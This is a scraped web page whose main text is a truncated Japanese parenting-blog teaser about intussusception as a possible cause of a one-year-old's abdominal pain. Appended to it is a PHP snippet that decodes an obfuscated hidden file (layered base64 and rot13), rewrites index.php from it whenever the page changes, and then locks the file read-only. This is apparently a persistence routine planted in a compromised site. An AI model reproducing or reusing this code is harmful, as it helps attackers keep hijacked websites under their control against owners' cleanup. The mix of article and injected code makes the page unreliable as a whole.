
1歳乳児の腹痛、それって腸重積かも!?
腸重積という病気はご存知でしょうか?赤ちゃんが夜寝つかなくて泣いてぐずるという経験は、子を持つ親なら誰でもあると思います。そして、意外とその理由が分からず苦労するんですよね。喉が渇いているのか、ただ単に寝付けないのか、もしくはどこか痛いの...
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }